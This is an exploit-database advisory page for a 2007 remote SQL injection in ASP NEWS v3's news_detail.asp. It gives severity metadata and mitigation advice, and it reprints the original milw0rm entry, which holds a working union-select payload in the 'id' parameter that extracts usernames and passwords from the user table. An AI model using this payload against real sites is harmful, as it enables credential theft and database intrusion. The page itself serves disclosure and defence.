header-logo
Suggest Exploit
vendor:
ASP NEWS
by:
ajann
7.5
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: ASP NEWS
Affected Version From: Unknown
Affected Version To: Version 3
Patch Exists: NO
Related CWE:
CPE: a:asp_news:asp_news:3
Metasploit:
Other Scripts:
Platforms Tested:
2007

ASP NEWS <= V3 (news_detail.asp) Remote SQL Injection Vulnerability

The vulnerability allows an attacker to execute arbitrary SQL queries on the target system through the 'id' parameter in the 'news_detail.asp' page. By injecting SQL code, the attacker can bypass authentication, retrieve sensitive information, modify or delete data in the database.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and use parameterized queries or prepared statements to prevent SQL injection attacks. Additionally, keeping the application and its components up-to-date with security patches can help prevent exploitation of this vulnerability.
Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  ASP NEWS <= V3 (news_detail.asp) Remote SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.planetgraphic.de/

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//news_detail.asp?id=[SQL]

Example:

//news_detail.asp?id=-1%20union%20select%200,username,password,0,0,0%20from%20tblusers

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-01-24]